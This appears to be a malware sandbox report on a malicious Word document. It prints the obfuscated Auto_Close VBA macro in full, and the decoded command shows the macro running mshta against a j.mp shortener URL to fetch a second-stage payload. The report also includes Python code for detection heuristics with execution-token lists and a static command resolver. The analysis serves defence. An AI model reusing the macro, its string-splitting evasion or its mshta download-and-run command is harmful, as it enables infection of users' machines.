Verdict: MALICIOUS
Risk Score: 128

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)
The critical heuristic OLE_VBA_SHELL and the high heuristic OLE_VBA_PCODE_AUTOEXEC_EXEC together indicate a Shell call reachable from an auto-execution entry point. The Auto_Close macro runs when the document is closed rather than when it is opened, so nothing visible happens at open time. It assembles a command string from four string fragments, each split so that no single literal contains a whole executable name or URL; reading the fragments in the extracted source, the assembled value is `"mshta" http://1230912489%1230192309@j.mp/jasdoaksdosasdkdkodk`. After a decoy message box ("Office 365 Not installed!"), the first `Shell ("WINWORD")` simply launches Word. The second call passes the identifier `WINWORD` concatenated with the assembled string; `WINWORD` is never assigned in the module, so without Option Explicit it is an Empty Variant and contributes nothing, and Shell receives the assembled command. The digits before the `@` are URL userinfo, not a host: the real host is the j.mp link shortener. The macro therefore launches mshta.exe (the HTML Application host) against a shortener URL, which is how it downloads and executes a second-stage payload.
Heuristics (4)

- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  `MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched line in script: `Sub Auto_Close()`
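The three heuristics above reimplemented as a small scanner, as an added example that is not the analyzer's own code: the heuristic IDs, severities and token lists are taken from the report, while the regexes, the function names (`present_tokens`, `scan_vba`, `heuristic_ids`) and the two extra inputs (a constructed p-code token dump and a constructed benign macro) are this example's own. It shows the property the OLE_VBA_PCODE_AUTOEXEC_EXEC description stresses: the rule fires on the pairing of an auto-exec entry point with an execution token, never on either alone, so it still works on a bare string dump from a compiled stream with no readable source.

```python
"""Reimplementation of OLE_VBA_SHELL, OLE_VBA_PCODE_AUTOEXEC_EXEC and
OLE_VBA_AUTOCLOSE (added example; token lists copied from the report)."""
import re

AUTOEXEC_TOKENS = (
    "Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
    "Auto_Close", "AutoClose",
)
EXEC_TOKENS = (
    "Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
    "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
    "ShellExecute", "ExecuteExcel4Macro",
)

# Positive case: the macros.bas preview from this report, verbatim.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Sub Auto_Close()
¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"
¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"
¨¨¨¨PDf_1¨¨ = "hta"" ht"
¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"
MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)
End Sub
'''

# Constructed: strings as they might be pulled from a compiled p-code stream
# whose source could not be extracted; no source lines, only identifiers.
PCODE_TOKENS = "Module1 Auto_Open MsgBox CreateObject WScript.Shell"

# Constructed benign control: an auto-exec entry point with nothing executable.
BENIGN_VBA = '''Sub Auto_Open()
    MsgBox "Welcome"
End Sub
'''


def present_tokens(text, tokens):
    """Return the tokens found as whole words; VBA identifiers are case-insensitive."""
    hits = []
    for tok in tokens:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, text, re.IGNORECASE):
            hits.append(tok)
    return hits


def scan_vba(text):
    """Return (heuristic_id, severity, detail) for one VBA source or p-code stream."""
    findings = []

    # OLE_VBA_SHELL: a Shell( call on a visible source line; report the first one.
    for line in text.splitlines():
        if re.search(r"(?<![A-Za-z0-9_])Shell\s*\(", line, re.IGNORECASE):
            findings.append(("OLE_VBA_SHELL", "critical", line.strip()))
            break

    autoexec = present_tokens(text, AUTOEXEC_TOKENS)
    execs = present_tokens(text, EXEC_TOKENS)

    # OLE_VBA_PCODE_AUTOEXEC_EXEC: only the pairing fires, never one side alone.
    if autoexec and execs:
        findings.append(("OLE_VBA_PCODE_AUTOEXEC_EXEC", "high",
                         "autoexec=%s exec=%s" % (",".join(autoexec), ",".join(execs))))

    # OLE_VBA_AUTOCLOSE: a close-time entry point (runs when the document is closed).
    if any(t.lower() in ("auto_close", "autoclose") for t in autoexec):
        findings.append(("OLE_VBA_AUTOCLOSE", "low", "Auto_Close"))

    return findings


def heuristic_ids(text):
    """Just the IDs, in the order scan_vba reports them."""
    return [f[0] for f in scan_vba(text)]


if __name__ == "__main__":
    for name, blob in (("sample", SAMPLE_VBA), ("pcode", PCODE_TOKENS), ("benign", BENIGN_VBA)):
        print(name)
        for hid, sev, detail in scan_vba(blob):
            print("  %-28s %-8s %s" % (hid, sev, detail))
```

Run it and the sample yields all three findings, the token dump yields only the pairing rule (no source line, so OLE_VBA_SHELL cannot match), and the benign control yields nothing even though it contains Auto_Open.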
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 540 bytes | 6d8d75469f94b5ad050f1c137899ab6f19b63a899f2ad7487188eb10dce8afa2 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
Sub Auto_Close()
¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"
¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"
¨¨¨¨PDf_1¨¨ = "hta"" ht"
¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"
MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)
End Sub
```
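To confirm what the concatenation in the preview actually hands to Shell without opening the document, the fragments can be resolved statically. The following is an added example, not the analyzer's output and not code from the sample; it emulates only the VBA subset the macro uses (string literals with `""` escapes, `+` concatenation, plain assignment, `:` statement separators, `Shell (...)` calls) and applies the VBA rule that a name never assigned is an Empty Variant, which concatenates as an empty string. The function names `split_outside_quotes`, `eval_expr`, `shell_commands` and `real_target` are this example's own.

```python
"""Statically recover the command the Auto_Close macro passes to Shell
(added example; the embedded macro is the macros.bas preview above)."""
import re
from urllib.parse import urlsplit

SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Sub Auto_Close()
¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"
¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"
¨¨¨¨PDf_1¨¨ = "hta"" ht"
¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"
MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)
End Sub
'''


def split_outside_quotes(text, sep):
    """Split on `sep` only outside "..." literals; a doubled "" inside a literal is an escaped quote."""
    parts, buf, in_str, i = [], [], False, 0
    while i < len(text):
        c = text[i]
        if c == '"':
            if in_str and text[i + 1:i + 2] == '"':
                buf.append('""')      # keep the escape for eval_expr to unescape
                i += 2
                continue
            in_str = not in_str
            buf.append(c)
        elif c == sep and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(c)
        i += 1
    parts.append("".join(buf).strip())
    return parts


def eval_expr(expr, env):
    """Evaluate a `+`-joined mix of string literals and variable names."""
    out = []
    for term in split_outside_quotes(expr, "+"):
        if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
            out.append(term[1:-1].replace('""', '"'))
        else:
            out.append(env.get(term, ""))   # unassigned name: Empty Variant -> ""
    return "".join(out)


def shell_commands(src):
    """Walk the macro once, in order, and return every resolved Shell argument."""
    env, commands = {}, []
    for raw in src.splitlines():
        for stmt in split_outside_quotes(raw, ":"):
            m = re.match(r"^Shell\s*\((.*)\)$", stmt)
            if m:
                commands.append(eval_expr(m.group(1), env))
                continue
            m = re.match(r"^(\S+)\s*=\s*(.*)$", stmt)
            if m:
                env[m.group(1)] = eval_expr(m.group(2), env)
    return commands


def real_target(command):
    """Return (hostname, path) of the URL in a command; userinfo before '@' is ignored."""
    url = re.search(r"https?://\S+", command).group(0)
    u = urlsplit(url)
    return u.hostname, u.path


if __name__ == "__main__":
    cmds = shell_commands(SAMPLE_VBA)
    for c in cmds:
        print("Shell ->", c)
    print("real host/path:", real_target(cmds[-1]))
```

The two resolved calls are `WINWORD` and `"mshta" http://1230912489%1230192309@j.mp/jasdoaksdosasdkdkodk`, and `urlsplit` confirms that `1230912489%1230192309` is userinfo while the host is `j.mp`: the numeric prefix exists only to make the URL look like something other than a link-shortener redirect.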